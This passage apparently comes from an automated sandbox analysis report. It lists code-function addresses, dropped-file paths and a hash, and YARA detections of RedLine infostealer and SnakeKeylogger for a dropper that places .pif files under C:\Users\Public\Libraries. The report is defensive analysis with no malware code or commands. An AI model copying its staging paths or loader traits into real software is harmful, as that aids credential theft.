Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039A7A	7_2_32039A7A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32032678	7_2_32032678
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203CC78	7_2_3203CC78
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32030E88	7_2_32030E88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203CC88	7_2_3203CC88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039A88	7_2_32039A88
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32030E98	7_2_32030E98
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203B698	7_2_3203B698
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203E898	7_2_3203E898
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203B6A8	7_2_3203B6A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203E8A8	7_2_3203E8A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D2B9	7_2_3203D2B9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A0B8	7_2_3203A0B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A0C8	7_2_3203A0C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D2C8	7_2_3203D2C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320358D0	7_2_320358D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320332D8	7_2_320332D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203EED8	7_2_3203EED8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32031CE9	7_2_32031CE9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203BCE8	7_2_3203BCE8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203EEE8	7_2_3203EEE8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32033CF9	7_2_32033CF9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320304F8	7_2_320304F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A6F8	7_2_3203A6F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D8F8	7_2_3203D8F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D908	7_2_3203D908
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32030508	7_2_32030508
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A708	7_2_3203A708
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203911A	7_2_3203911A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32034719	7_2_32034719
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203C318	7_2_3203C318
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203F518	7_2_3203F518
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203C328	7_2_3203C328
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039128	7_2_32039128
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203F528	7_2_3203F528
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203AD3A	7_2_3203AD3A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203DF38	7_2_3203DF38
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203DF48	7_2_3203DF48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203AD48	7_2_3203AD48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203975A	7_2_3203975A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32031359	7_2_32031359
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203C958	7_2_3203C958
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203FB60	7_2_3203FB60
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203C968	7_2_3203C968
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039768	7_2_32039768
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32031368	7_2_32031368
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32038B71	7_2_32038B71
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203FB70	7_2_3203FB70
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32036579	7_2_32036579
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32033F80	7_2_32033F80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203E588	7_2_3203E588
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203B388	7_2_3203B388
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039D9A	7_2_32039D9A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203CF9F	7_2_3203CF9F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203CFA8	7_2_3203CFA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32039DA8	7_2_32039DA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320321B2	7_2_320321B2
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320379B9	7_2_320379B9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203EBB9	7_2_3203EBB9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203B9B8	7_2_3203B9B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320321C0	7_2_320321C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320309C0	7_2_320309C0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203B9C8	7_2_3203B9C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203EBC8	7_2_3203EBC8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320309D0	7_2_320309D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_320383D9	7_2_320383D9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A3D8	7_2_3203A3D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D5D8	7_2_3203D5D8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203A3E8	7_2_3203A3E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203D5E8	7_2_3203D5E8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203BFF9	7_2_3203BFF9
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32038DF8	7_2_32038DF8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3203F1F8	7_2_3203F1F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B4388	7_2_321B4388
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B20C8	7_2_321B20C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B90F4	7_2_321B90F4
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B27B0	7_2_321B27B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B35B8	7_2_321B35B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B4A70	7_2_321B4A70
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B2ED0	7_2_321B2ED0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B3CA0	7_2_321B3CA0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B12B8	7_2_321B12B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B12A8	7_2_321B12A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B92F0	7_2_321B92F0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B9300	7_2_321B9300
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B437A	7_2_321B437A
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B0040	7_2_321B0040
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B20B8	7_2_321B20B8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321BB130	7_2_321BB130
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B27A0	7_2_321B27A0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B35A8	7_2_321B35A8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B4A60	7_2_321B4A60
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B2EC2	7_2_321B2EC2
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B3C8F	7_2_321B3C8F
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B1D26	7_2_321B1D26
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_321B1D48	7_2_321B1D48
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3252B830	7_2_3252B830
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32525270	7_2_32525270
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3252C710	7_2_3252C710
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3252C720	7_2_3252C720
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_325277D0	7_2_325277D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3252A498	7_2_3252A498
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_325249C8	7_2_325249C8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_326616B0	7_2_326616B0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_326623B7	7_2_326623B7
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32CF3AA8	7_2_32CF3AA8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32CFC728	7_2_32CFC728
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32CF96EB	7_2_32CF96EB
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32CF96F8	7_2_32CF96F8
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_32CFC723	7_2_32CFC723
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_3409BA80	7_2_3409BA80
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341FC490	7_2_341FC490
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341F11D0	7_2_341F11D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341F11D0	7_2_341F11D0
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_341F2258	7_2_341F2258
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: 9_2_02AC20B4	9_2_02AC20B4

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\fpnevlzQ.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028B3F1C appears 45 times
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028A4444 appears 245 times
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028A4270 appears 31 times
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028A45D0 appears 832 times
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028B3E98 appears 56 times
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: String function: 028A424C appears 64 times
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: String function: 02AC4444 appears 154 times
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: String function: 02AC45D0 appears 576 times
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: String function: 02AD3E98 appears 50 times
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: String function: 0040D606 appears 48 times
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: String function: 0040E1D8 appears 88 times

Source: NETUTILS.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: PWSW6GK3ZC.exe, 00000000.00000003.2112236025.00000000006FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101681572.000000007F0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2135728965.00000000206E1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2137266284.00000000210A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101413856.000000007F0EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2139172648.00000000213B9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2139172648.00000000213B9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2112236025.000000000072E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101681572.000000007F126000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101681572.000000007F126000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2137266284.0000000021112000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000003.2101000543.000000007F156000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2137466708.00000000211AA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs PWSW6GK3ZC.exe
Source: PWSW6GK3ZC.exe, 00000000.00000002.2137466708.00000000211AA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs PWSW6GK3ZC.exe

Source: PWSW6GK3ZC.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 10.2.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.1.fpnevlzQ.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Qzlvenpf.PIF.21108348.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f830000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30630f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.2de602c6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.3.fpnevlzQ.pif.2c39f308.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.1.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
